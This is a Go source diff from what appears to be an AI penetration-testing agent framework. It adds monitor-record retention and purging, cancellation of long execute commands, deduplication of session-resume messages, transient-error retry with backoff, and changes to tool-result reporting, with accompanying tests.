@@ -1168,7 +1309,7 @@ func (m *ExternalMCPManager) StopAll() {
// 清理所有工具列表缓存 // 清理所有工具列表缓存
m.toolCacheMu.Lock() m.toolCacheMu.Lock()
m.toolCache = make(map[string][]Tool) m.toolCache = make(map[string]toolListCacheEntry)
m.toolCacheMu.Unlock() m.toolCacheMu.Unlock()
// 停止后台刷新(使用 select 避免重复关闭 channel // 停止后台刷新(使用 select 避免重复关闭 channel
+26
View File
@@ -11,7 +11,16 @@ type ToolRunRegistry interface {
UnregisterRunningTool(conversationID, executionID string) UnregisterRunningTool(conversationID, executionID string)
} }
// EinoExecuteRunRegistry 登记进行中的 Eino filesystem execute,供「中断并继续」终止 amass 等长命令。
type EinoExecuteRunRegistry interface {
RegisterActiveEinoExecute(conversationID string, cancel context.CancelFunc)
UnregisterActiveEinoExecute(conversationID string)
AbortActiveEinoExecute(conversationID, note string) bool
TakeEinoExecuteAbortNote(conversationID string) string
}
type toolRunRegistryCtxKey struct{} type toolRunRegistryCtxKey struct{}
type einoExecuteRunRegistryCtxKey struct{}
type mcpConversationIDCtxKey struct{} type mcpConversationIDCtxKey struct{}
// WithToolRunRegistry 将登记器注入 ctxEino / 原生 Agent 任务 ctx)。 // WithToolRunRegistry 将登记器注入 ctxEino / 原生 Agent 任务 ctx)。
@@ -31,6 +40,23 @@ func ToolRunRegistryFromContext(ctx context.Context) ToolRunRegistry {
return v return v
} }
// WithEinoExecuteRunRegistry 将 Eino execute 取消登记器注入 ctx。
func WithEinoExecuteRunRegistry(ctx context.Context, reg EinoExecuteRunRegistry) context.Context {
if ctx == nil || reg == nil {
return ctx
}
return context.WithValue(ctx, einoExecuteRunRegistryCtxKey{}, reg)
}
// EinoExecuteRunRegistryFromContext 取出 Eino execute 登记器(无则 nil)。
func EinoExecuteRunRegistryFromContext(ctx context.Context) EinoExecuteRunRegistry {
if ctx == nil {
return nil
}
v, _ := ctx.Value(einoExecuteRunRegistryCtxKey{}).(EinoExecuteRunRegistry)
return v
}
// WithMCPConversationID 将对话 ID 注入 ctx,供 CallTool 内与 executionId 关联。 // WithMCPConversationID 将对话 ID 注入 ctx,供 CallTool 内与 executionId 关联。
func WithMCPConversationID(ctx context.Context, conversationID string) context.Context { func WithMCPConversationID(ctx context.Context, conversationID string) context.Context {
if ctx == nil { if ctx == nil {
+21
View File
@@ -21,6 +21,7 @@ import (
// MonitorStorage 监控数据存储接口 // MonitorStorage 监控数据存储接口
type MonitorStorage interface { type MonitorStorage interface {
SaveToolExecution(exec *ToolExecution) error SaveToolExecution(exec *ToolExecution) error
UpdateToolExecutionResult(id string, result *ToolResult) error
LoadToolExecutions() ([]*ToolExecution, error) LoadToolExecutions() ([]*ToolExecution, error)
GetToolExecution(id string) (*ToolExecution, error) GetToolExecution(id string) (*ToolExecution, error)
SaveToolStats(toolName string, stats *ToolStats) error SaveToolStats(toolName string, stats *ToolStats) error
@@ -963,6 +964,26 @@ func (s *Server) RecordCompletedToolInvocation(toolName string, args map[string]
return executionID return executionID
} }
// UpdateToolExecutionResult 将监控库中的工具结果更新为送入模型的展示正文(如 reduction 后的 persisted-output)。
func (s *Server) UpdateToolExecutionResult(executionID string, result *ToolResult) error {
if s == nil {
return nil
}
executionID = strings.TrimSpace(executionID)
if executionID == "" || result == nil {
return nil
}
s.mu.Lock()
if exec, ok := s.executions[executionID]; ok && exec != nil {
exec.Result = result
}
s.mu.Unlock()
if s.storage != nil {
return s.storage.UpdateToolExecutionResult(executionID, result)
}
return nil
}
// cleanupOldExecutions 清理旧的执行记录,防止内存无限增长 // cleanupOldExecutions 清理旧的执行记录,防止内存无限增长
func (s *Server) cleanupOldExecutions() { func (s *Server) cleanupOldExecutions() {
if len(s.executions) <= s.maxExecutionsInMemory { if len(s.executions) <= s.maxExecutionsInMemory {
+71
View File
@@ -0,0 +1,71 @@
package monitor
import (
"time"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
const retentionPurgeInterval = time.Hour
// Service manages MCP tool execution monitor retention.
type Service struct {
db *database.DB
cfg *config.Config
logger *zap.Logger
}
// NewService creates a monitor retention service.
func NewService(db *database.DB, cfg *config.Config, logger *zap.Logger) *Service {
return &Service{db: db, cfg: cfg, logger: logger}
}
// RetentionDays returns configured retention; 0 means keep forever.
func (s *Service) RetentionDays() int {
if s == nil || s.cfg == nil {
return config.MonitorConfig{}.RetentionDaysEffective()
}
return s.cfg.Monitor.RetentionDaysEffective()
}
// PurgeExpired deletes tool execution rows older than retention_days when configured.
func (s *Service) PurgeExpired() {
if s == nil || s.db == nil || s.cfg == nil {
return
}
days := s.cfg.Monitor.RetentionDaysEffective()
if days <= 0 {
return
}
cutoff := time.Now().AddDate(0, 0, -days)
n, err := s.db.PurgeToolExecutionsBefore(cutoff)
if err != nil {
if s.logger != nil {
s.logger.Warn("清理过期 MCP 执行记录失败", zap.Error(err))
}
return
}
if n > 0 && s.logger != nil {
s.logger.Info("已清理过期 MCP 执行记录", zap.Int64("deleted", n), zap.Int("retention_days", days))
}
}
// StartRetentionLoop periodically purges expired tool execution rows.
func StartRetentionLoop(s *Service, logger *zap.Logger) {
if s == nil {
return
}
go func() {
ticker := time.NewTicker(retentionPurgeInterval)
defer ticker.Stop()
for range ticker.C {
s.PurgeExpired()
if logger != nil {
logger.Debug("monitor retention tick completed")
}
}
}()
}
+94
View File
@@ -0,0 +1,94 @@
package monitor
import (
"path/filepath"
"testing"
"time"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/mcp"
"go.uber.org/zap"
)
func TestServicePurgeExpired_respectsZeroRetention(t *testing.T) {
dbPath := filepath.Join(t.TempDir(), "monitor.db")
db, err := database.NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
exec := &mcp.ToolExecution{
ID: "ancient",
ToolName: "curl::get",
Arguments: map[string]interface{}{},
Status: "completed",
StartTime: mustParseTime(t, "2020-01-01T00:00:00Z"),
}
if err := db.SaveToolExecution(exec); err != nil {
t.Fatalf("SaveToolExecution: %v", err)
}
zero := 0
svc := NewService(db, &config.Config{
Monitor: config.MonitorConfig{RetentionDays: &zero},
}, zap.NewNop())
svc.PurgeExpired()
if _, err := db.GetToolExecution("ancient"); err != nil {
t.Fatalf("record should remain when retention_days=0: %v", err)
}
}
func TestServicePurgeExpired_deletesOldRows(t *testing.T) {
dbPath := filepath.Join(t.TempDir(), "monitor.db")
db, err := database.NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
exec := &mcp.ToolExecution{
ID: "ancient",
ToolName: "curl::get",
Arguments: map[string]interface{}{},
Status: "completed",
StartTime: mustParseTime(t, "2020-01-01T00:00:00Z"),
}
if err := db.SaveToolExecution(exec); err != nil {
t.Fatalf("SaveToolExecution: %v", err)
}
days := 90
svc := NewService(db, &config.Config{
Monitor: config.MonitorConfig{RetentionDays: &days},
}, zap.NewNop())
svc.PurgeExpired()
if _, err := db.GetToolExecution("ancient"); err == nil {
t.Fatal("record should be purged when older than retention_days")
}
}
func TestRetentionDaysEffective_defaults(t *testing.T) {
got := config.MonitorConfig{}.RetentionDaysEffective()
if got != 90 {
t.Fatalf("default = %d, want 90", got)
}
zero := 0
cfg := config.MonitorConfig{RetentionDays: &zero}
if cfg.RetentionDaysEffective() != 0 {
t.Fatalf("zero = %d, want 0", cfg.RetentionDaysEffective())
}
}
func mustParseTime(t *testing.T, value string) time.Time {
t.Helper()
parsed, err := time.Parse(time.RFC3339, value)
if err != nil {
t.Fatalf("parse time: %v", err)
}
return parsed
}
@@ -0,0 +1,104 @@
package multiagent
import (
"context"
"strings"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/schema"
"go.uber.org/zap"
)
// continuationSessionMarker matches Cursor / IDE session-resume user injections.
const continuationSessionMarker = "This session is being continued from a previous conversation"
// continuationUserDedupMiddleware keeps only the latest session-resume user message when
// multiple continuation injections were stacked (e.g. after repeated out-of-context resumes).
type continuationUserDedupMiddleware struct {
adk.BaseChatModelAgentMiddleware
logger *zap.Logger
phase string
}
func newContinuationUserDedupMiddleware(logger *zap.Logger, phase string) adk.ChatModelAgentMiddleware {
return &continuationUserDedupMiddleware{logger: logger, phase: phase}
}
func (m *continuationUserDedupMiddleware) BeforeModelRewriteState(
ctx context.Context,
state *adk.ChatModelAgentState,
mc *adk.ModelContext,
) (context.Context, *adk.ChatModelAgentState, error) {
_ = mc
if m == nil || state == nil || len(state.Messages) == 0 {
return ctx, state, nil
}
deduped, dropped := dedupContinuationUserMessages(state.Messages)
if dropped == 0 {
return ctx, state, nil
}
if m.logger != nil {
m.logger.Info("eino continuation user messages deduplicated",
zap.String("phase", m.phase),
zap.Int("dropped", dropped),
zap.Int("messages_before", len(state.Messages)),
zap.Int("messages_after", len(deduped)),
)
}
out := *state
out.Messages = deduped
return ctx, &out, nil
}
func adkUserMessageText(msg adk.Message) string {
if msg == nil {
return ""
}
var b strings.Builder
if s := strings.TrimSpace(msg.Content); s != "" {
b.WriteString(s)
}
for _, part := range msg.UserInputMultiContent {
if part.Type == schema.ChatMessagePartTypeText {
if s := strings.TrimSpace(part.Text); s != "" {
if b.Len() > 0 {
b.WriteByte('\n')
}
b.WriteString(s)
}
}
}
return b.String()
}
func isContinuationUserMessage(msg adk.Message) bool {
if msg == nil || msg.Role != schema.User {
return false
}
return strings.Contains(adkUserMessageText(msg), continuationSessionMarker)
}
func dedupContinuationUserMessages(msgs []adk.Message) ([]adk.Message, int) {
lastIdx := -1
contCount := 0
for i, msg := range msgs {
if !isContinuationUserMessage(msg) {
continue
}
contCount++
lastIdx = i
}
if contCount <= 1 {
return msgs, 0
}
out := make([]adk.Message, 0, len(msgs)-(contCount-1))
dropped := 0
for i, msg := range msgs {
if isContinuationUserMessage(msg) && i != lastIdx {
dropped++
continue
}
out = append(out, msg)
}
return out, dropped
}
@@ -0,0 +1,65 @@
package multiagent
import (
"context"
"strings"
"testing"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/schema"
)
func continuationUser(text string) adk.Message {
return &schema.Message{
Role: schema.User,
UserInputMultiContent: []schema.MessageInputPart{
{Type: schema.ChatMessagePartTypeText, Text: continuationSessionMarker + "\n" + text},
{Type: schema.ChatMessagePartTypeText, Text: "Please continue the conversation from where we left it off."},
},
}
}
func TestDedupContinuationUserMessages_KeepsLatest(t *testing.T) {
msgs := []adk.Message{
continuationUser("summary old"),
schema.UserMessage("real task"),
continuationUser("summary new"),
}
out, dropped := dedupContinuationUserMessages(msgs)
if dropped != 1 {
t.Fatalf("dropped=%d want 1", dropped)
}
if len(out) != 2 {
t.Fatalf("len=%d want 2", len(out))
}
if out[0].Role != schema.User || adkUserMessageText(out[0]) != "real task" {
t.Fatalf("first should remain real task, got %q", adkUserMessageText(out[0]))
}
if !strings.Contains(adkUserMessageText(out[1]), "summary new") {
t.Fatalf("latest continuation not kept: %q", adkUserMessageText(out[1]))
}
}
func TestDedupContinuationUserMessages_NoOpSingle(t *testing.T) {
msgs := []adk.Message{continuationUser("only"), schema.UserMessage("task")}
out, dropped := dedupContinuationUserMessages(msgs)
if dropped != 0 || len(out) != 2 {
t.Fatalf("unexpected change dropped=%d len=%d", dropped, len(out))
}
}
func TestContinuationUserDedupMiddleware(t *testing.T) {
mw := newContinuationUserDedupMiddleware(nil, "test")
state := &adk.ChatModelAgentState{Messages: []adk.Message{
continuationUser("old"),
continuationUser("new"),
schema.UserMessage("task"),
}}
_, out, err := mw.(*continuationUserDedupMiddleware).BeforeModelRewriteState(context.Background(), state, nil)
if err != nil {
t.Fatal(err)
}
if len(out.Messages) != 2 {
t.Fatalf("want 2 messages after dedup, got %d", len(out.Messages))
}
}
+180 -103
View File
@@ -88,6 +88,7 @@ type einoADKRunLoopArgs struct {
// 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。 // 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。
FilesystemMonitorAgent *agent.Agent FilesystemMonitorAgent *agent.Agent
FilesystemMonitorRecord einomcp.ExecutionRecorder FilesystemMonitorRecord einomcp.ExecutionRecorder
MCPExecutionBinder *MCPExecutionBinder
// ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 SetMCP 桥 Fire 以补全 tool_result。 // ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 SetMCP 桥 Fire 以补全 tool_result。
ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder
@@ -285,53 +286,63 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
executeStdoutDupMu.Unlock() executeStdoutDupMu.Unlock()
} }
var toolResultSent sync.Map // toolCallID -> struct{}ADK Tool 消息去重,避免 bridge 与事件流各推一次 var toolResultSent sync.Map // toolCallID -> struct{}ADK Tool 事件去重(权威正文来自 reduction 处理后的 agent 上下文)
if args.ToolInvokeNotify != nil { tryEmitToolResultProgress := func(toolName, content, toolCallID string, isErr bool, agentName string) {
args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) { if progress == nil {
tid := strings.TrimSpace(toolCallID) return
removePendingByID(tid) }
if tid == "" || progress == nil { toolName = strings.TrimSpace(toolName)
return if toolName == "" {
toolName = "unknown"
}
preview := content
if len(preview) > 200 {
preview = preview[:200] + "..."
}
data := map[string]interface{}{
"toolName": toolName,
"success": !isErr,
"isError": isErr,
"result": content,
"resultPreview": preview,
"conversationId": conversationID,
"einoAgent": agentName,
"einoRole": einoRoleTag(agentName),
"source": "eino",
}
tid := strings.TrimSpace(toolCallID)
if tid == "" {
if inferred, ok := popNextPendingForAgent(agentName); ok {
tid = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(orchestratorName); ok {
tid = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(""); ok {
tid = inferred.ToolCallID
} else if inferred, ok := popAnyPending(); ok {
tid = inferred.ToolCallID
} }
}
if tid != "" {
removePendingByID(tid)
if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded { if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded {
return return
} }
isErr := !success || invokeErr != nil data["toolCallId"] = tid
body := content toolCallID = tid
if invokeErr != nil { }
// 保留已流式累计的 stdout(如 execute 超时前的一半输出),避免 tool_result 只剩错误串、模型与 UI 丢失上下文 recordPendingExecuteStdoutDup(toolName, content, isErr)
tail := friendlyEinoExecuteInvokeTail(invokeErr) recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
// execute 流式包装可能已把超时句写入 content(供 ADK tool 与流式 delta);勿重复拼接 if args.FilesystemMonitorAgent != nil && args.MCPExecutionBinder != nil {
if tail != "" && strings.Contains(content, tail) { if execID := args.MCPExecutionBinder.ExecutionID(toolCallID); execID != "" {
body = content args.FilesystemMonitorAgent.UpdateMCPExecutionDisplayResult(execID, content)
} else if strings.TrimSpace(content) != "" {
body = strings.TrimRight(content, "\n") + "\n\n" + tail
} else {
body = tail
}
isErr = true
} }
recordPendingExecuteStdoutDup(toolName, body, isErr) }
preview := body progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
if len(preview) > 200 { }
preview = preview[:200] + "..." if args.ToolInvokeNotify != nil {
} args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
agentTag := strings.TrimSpace(einoAgent) removePendingByID(strings.TrimSpace(toolCallID))
if agentTag == "" { // tool_result 仅由下方 ADK schema.Tool 事件推送,正文与送入模型的上下文一致(含 reduction 截断)。
agentTag = orchestratorName
}
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), map[string]interface{}{
"toolName": toolName,
"success": !isErr,
"isError": isErr,
"result": body,
"resultPreview": preview,
"toolCallId": tid,
"conversationId": conversationID,
"einoAgent": agentTag,
"einoRole": einoRoleTag(agentTag),
"source": "eino",
})
}) })
} }
@@ -372,6 +383,12 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
runner := adk.NewRunner(ctx, runnerCfg) runner := adk.NewRunner(ctx, runnerCfg)
startRunnerIter := func(runMsgs []adk.Message) *adk.AsyncIterator[*adk.AgentEvent] {
if checkPointID != "" {
return runner.Run(ctx, runMsgs, adk.WithCheckPointID(checkPointID))
}
return runner.Run(ctx, runMsgs)
}
var iter *adk.AsyncIterator[*adk.AgentEvent] var iter *adk.AsyncIterator[*adk.AgentEvent]
if cpStore != nil && checkPointID != "" { if cpStore != nil && checkPointID != "" {
if _, existed, getErr := cpStore.Get(ctx, checkPointID); getErr != nil { if _, existed, getErr := cpStore.Get(ctx, checkPointID); getErr != nil {
@@ -411,12 +428,9 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
if iter == nil { if iter == nil {
if checkPointID != "" { iter = startRunnerIter(msgs)
iter = runner.Run(ctx, msgs, adk.WithCheckPointID(checkPointID))
} else {
iter = runner.Run(ctx, msgs)
}
} }
transientRetrier := newEinoTransientRunRetrier(einoTransientRunRetryPolicyFromArgs(args))
handleRunErr := func(runErr error) error { handleRunErr := func(runErr error) error {
if runErr == nil { if runErr == nil {
return nil return nil
@@ -469,26 +483,60 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
return runErr return runErr
} }
// maybeRetryTransientRun:不在此层 runner.Run/Resume;由 handler 落库 + loadHistoryFromAgentTrace 分段续跑(同中断并继续)。 maybeRetryTransientRun := func(runErr error) (restarted bool, fatal error) {
maybeRetryTransientRun := func(runErr error) (retry bool, fatal error) { if runErr == nil {
if runErr == nil || !isEinoTransientRunError(runErr) { return false, nil
}
if !isEinoTransientRunError(runErr) {
return false, handleRunErr(runErr) return false, handleRunErr(runErr)
} }
restarted, restartMsgs, ctxSource, backoff, retErr := transientRetrier.tryRetry(
ctx, runErr, args, baseMsgs, runAccumulatedMsgs, baseAccumulatedCount,
)
if retErr != nil {
flushAllPendingAsFailed(runErr)
if logger != nil {
logger.Warn("eino transient retry exhausted",
zap.Error(retErr),
zap.String("orchestration", orchMode),
zap.Int("maxAttempts", transientRetrier.maxAttempts()))
}
return false, retErr
}
if !restarted {
return false, nil
}
attemptNo := transientRetrier.attempt()
maxAttempts := transientRetrier.maxAttempts()
if logger != nil { if logger != nil {
logger.Warn("eino transient error, ending run segment for handler resume", logger.Warn("eino transient error, retrying after backoff",
zap.Error(runErr), zap.Error(runErr),
zap.String("orchestration", orchMode)) zap.String("orchestration", orchMode),
zap.Int("attempt", attemptNo),
zap.Int("maxAttempts", maxAttempts),
zap.Duration("backoff", backoff))
} }
if progress != nil { if progress != nil {
progress("eino_run_retry", "遇到临时错误(限流或网络波动),将保存上下文并重试…", map[string]interface{}{ progress("eino_run_retry", fmt.Sprintf("遇到临时错误(限流或网络波动),%d 秒后第 %d/%d 次重试…", int(backoff.Seconds()), attemptNo, maxAttempts), map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
"source": "eino", "source": "eino",
"orchestration": orchMode, "orchestration": orchMode,
"error": runErr.Error(), "error": runErr.Error(),
"resumeKind": "trace_segment", "attempt": attemptNo,
"maxAttempts": maxAttempts,
"backoffSec": int(backoff.Seconds()),
})
progress("eino_run_retry", "已恢复上下文,正在重试…", map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"orchestration": orchMode,
"attempt": attemptNo,
"contextSource": string(ctxSource),
}) })
} }
return false, ErrTransientRetryContinue msgs = restartMsgs
iter = startRunnerIter(msgs)
return true, nil
} }
takePartial := func(runErr error) (*RunResult, error) { takePartial := func(runErr error) (*RunResult, error) {
@@ -572,9 +620,15 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
continue continue
} }
if ev.Err != nil { if ev.Err != nil {
if _, retErr := maybeRetryTransientRun(ev.Err); retErr != nil { restarted, retErr := maybeRetryTransientRun(ev.Err)
if retErr != nil {
return takePartial(retErr) return takePartial(retErr)
} }
if restarted {
continue
}
} else {
transientRetrier.reset()
} }
if ev.AgentName != "" && progress != nil { if ev.AgentName != "" && progress != nil {
iterEinoAgent := orchestratorName iterEinoAgent := orchestratorName
@@ -619,19 +673,66 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
} }
// 仅在代理切换时更新进度标题;同一代理的每个 ADK 事件不再重复刷 progress。
if einoLastAgent != ev.AgentName {
progress("progress", fmt.Sprintf("[Eino] %s", ev.AgentName), map[string]interface{}{
"conversationId": conversationID,
"einoAgent": ev.AgentName,
"einoRole": einoRoleTag(ev.AgentName),
"orchestration": orchMode,
})
}
einoLastAgent = ev.AgentName einoLastAgent = ev.AgentName
progress("progress", fmt.Sprintf("[Eino] %s", ev.AgentName), map[string]interface{}{
"conversationId": conversationID,
"einoAgent": ev.AgentName,
"einoRole": einoRoleTag(ev.AgentName),
"orchestration": orchMode,
})
} }
if ev.Output == nil || ev.Output.MessageOutput == nil { if ev.Output == nil || ev.Output.MessageOutput == nil {
continue continue
} }
mv := ev.Output.MessageOutput mv := ev.Output.MessageOutput
if mv.IsStreaming && mv.MessageStream != nil && mv.Role == schema.Tool {
toolName := strings.TrimSpace(mv.ToolName)
var toolBuf strings.Builder
streamToolCallID := ""
var toolStreamRecvErr error
for {
chunk, rerr := mv.MessageStream.Recv()
if errors.Is(rerr, io.EOF) {
break
}
if rerr != nil {
toolStreamRecvErr = rerr
break
}
if chunk == nil {
continue
}
if chunk.Content != "" {
toolBuf.WriteString(chunk.Content)
}
if tid := strings.TrimSpace(chunk.ToolCallID); tid != "" {
streamToolCallID = tid
}
}
content := toolBuf.String()
isErr := false
if strings.HasPrefix(content, einomcp.ToolErrorPrefix) {
isErr = true
content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
}
if streamToolCallID != "" {
opts := []schema.ToolMessageOption{schema.WithToolName(toolName)}
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.ToolMessage(content, streamToolCallID, opts...))
}
tryEmitToolResultProgress(toolName, content, streamToolCallID, isErr, ev.AgentName)
if toolStreamRecvErr != nil && logger != nil {
logger.Warn("eino tool result stream recv error",
zap.Error(toolStreamRecvErr),
zap.String("agent", ev.AgentName),
zap.String("tool", toolName))
}
continue
}
if mv.IsStreaming && mv.MessageStream != nil { if mv.IsStreaming && mv.MessageStream != nil {
mainStreamID := fmt.Sprintf("eino-main-%s-%d", conversationID, atomic.AddInt64(&mainResponseStreamSeq, 1)) mainStreamID := fmt.Sprintf("eino-main-%s-%d", conversationID, atomic.AddInt64(&mainResponseStreamSeq, 1))
streamHeaderSent := false streamHeaderSent := false
@@ -785,6 +886,16 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
} }
if progress != nil && reasoningStreamID != "" && strings.TrimSpace(reasoningBuf) != "" {
progress("reasoning_chain_stream_end", openai.DisplayReasoningContent(strings.TrimSpace(reasoningBuf)), map[string]interface{}{
"streamId": reasoningStreamID,
"conversationId": conversationID,
"source": "eino",
"einoAgent": ev.AgentName,
"einoRole": einoRoleTag(ev.AgentName),
"orchestration": orchMode,
})
}
if streamsMainAssistant(ev.AgentName) { if streamsMainAssistant(ev.AgentName) {
s := strings.TrimSpace(mainAssistantBuf) s := strings.TrimSpace(mainAssistantBuf)
if mainAssistDupTarget != "" { if mainAssistDupTarget != "" {
@@ -883,9 +994,13 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
"einoRole": einoRoleTag(ev.AgentName), "einoRole": einoRoleTag(ev.AgentName),
}) })
} }
if _, retErr := maybeRetryTransientRun(streamRecvErr); retErr != nil { restarted, retErr := maybeRetryTransientRun(streamRecvErr)
if retErr != nil {
return takePartial(retErr) return takePartial(retErr)
} }
if restarted {
continue
}
} }
continue continue
} }
@@ -963,7 +1078,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
} }
if mv.Role == schema.Tool && progress != nil { if (mv.Role == schema.Tool || msg.Role == schema.Tool) && progress != nil {
toolName := msg.ToolName toolName := msg.ToolName
if toolName == "" { if toolName == "" {
toolName = mv.ToolName toolName = mv.ToolName
@@ -976,46 +1091,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix) content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
} }
preview := content
if len(preview) > 200 {
preview = preview[:200] + "..."
}
data := map[string]interface{}{
"toolName": toolName,
"success": !isErr,
"isError": isErr,
"result": content,
"resultPreview": preview,
"conversationId": conversationID,
"einoAgent": ev.AgentName,
"einoRole": einoRoleTag(ev.AgentName),
"source": "eino",
}
toolCallID := strings.TrimSpace(msg.ToolCallID) toolCallID := strings.TrimSpace(msg.ToolCallID)
if toolCallID == "" { tryEmitToolResultProgress(toolName, content, toolCallID, isErr, ev.AgentName)
if inferred, ok := popNextPendingForAgent(ev.AgentName); ok {
toolCallID = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(orchestratorName); ok {
toolCallID = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(""); ok {
toolCallID = inferred.ToolCallID
} else if inferred, ok := popAnyPending(); ok {
toolCallID = inferred.ToolCallID
}
}
if toolCallID != "" {
removePendingByID(toolCallID)
if _, loaded := toolResultSent.LoadOrStore(toolCallID, struct{}{}); loaded {
// ToolInvokeNotify 可能已推过 tool_result(如 execute 流式包装里 Fire 仅携带截断后的 stdout),
// 此处仍应用 ADK Tool 消息中的完整内容刷新去重基准,避免模型复述全文时与截断串比对失败而重复展示「助手输出」。
recordPendingExecuteStdoutDup(toolName, content, isErr)
continue
}
data["toolCallId"] = toolCallID
}
recordPendingExecuteStdoutDup(toolName, content, isErr)
recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
} }
} }
@@ -0,0 +1,50 @@
package multiagent
import (
"github.com/cloudwego/eino/adk"
"go.uber.org/zap"
)
// einoChatModelTailConfig configures middleware appended after reduction/skill/plantask
// and immediately before each ChatModel invocation pipeline completes.
//
// Order (best practice):
// 1. system merge — accurate token count for summarization
// 2. continuation user dedup — drop stale session-resume injections
// 3. summarization
// 4. orphan tool prune
// 5. telemetry
// 6. model-facing trace snapshot
type einoChatModelTailConfig struct {
logger *zap.Logger
phase string
summarization adk.ChatModelAgentMiddleware
modelName string
conversationID string
trace *modelFacingTraceHolder
skipOrphanPruner bool
skipTelemetry bool
skipTrace bool
}
func appendEinoChatModelTailMiddlewares(handlers []adk.ChatModelAgentMiddleware, cfg einoChatModelTailConfig) []adk.ChatModelAgentMiddleware {
handlers = append(handlers, newSystemMessageNormalizerMiddleware(cfg.logger, cfg.phase))
handlers = append(handlers, newContinuationUserDedupMiddleware(cfg.logger, cfg.phase))
if cfg.summarization != nil {
handlers = append(handlers, cfg.summarization)
}
if !cfg.skipOrphanPruner {
handlers = append(handlers, newOrphanToolPrunerMiddleware(cfg.logger, cfg.phase))
}
if !cfg.skipTelemetry {
if teleMw := newEinoModelInputTelemetryMiddleware(cfg.logger, cfg.modelName, cfg.conversationID, cfg.phase); teleMw != nil {
handlers = append(handlers, teleMw)
}
}
if !cfg.skipTrace && cfg.trace != nil {
if capMw := newModelFacingTraceMiddleware(cfg.trace); capMw != nil {
handlers = append(handlers, capMw)
}
}
return handlers
}
+3 -3
View File
@@ -9,8 +9,8 @@ import (
// newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId) // newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId)
// 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。 // 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。
func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(command, stdout string, success bool, invokeErr error) { func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(toolCallID, command, stdout string, success bool, invokeErr error) {
return func(command, stdout string, success bool, invokeErr error) { return func(toolCallID, command, stdout string, success bool, invokeErr error) {
if ag == nil || recorder == nil { if ag == nil || recorder == nil {
return return
} }
@@ -25,7 +25,7 @@ func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRe
args := map[string]interface{}{"command": command} args := map[string]interface{}{"command": command}
id := ag.RecordLocalToolExecution("execute", args, stdout, err) id := ag.RecordLocalToolExecution("execute", args, stdout, err)
if id != "" { if id != "" {
recorder(id) recorder(id, toolCallID)
} }
} }
} }
@@ -6,9 +6,11 @@ import (
"fmt" "fmt"
"io" "io"
"strings" "strings"
"sync"
"time" "time"
"cyberstrike-ai/internal/einomcp" "cyberstrike-ai/internal/einomcp"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"github.com/cloudwego/eino/adk/filesystem" "github.com/cloudwego/eino/adk/filesystem"
@@ -34,6 +36,15 @@ func einoExecuteTimeoutUserHint() string {
return "已超时终止 · Timed out" return "已超时终止 · Timed out"
} }
// einoExecuteRecvErrIsToolTimeout 判断 Recv 错误是否由 agent.tool_timeout_minutes 触发。
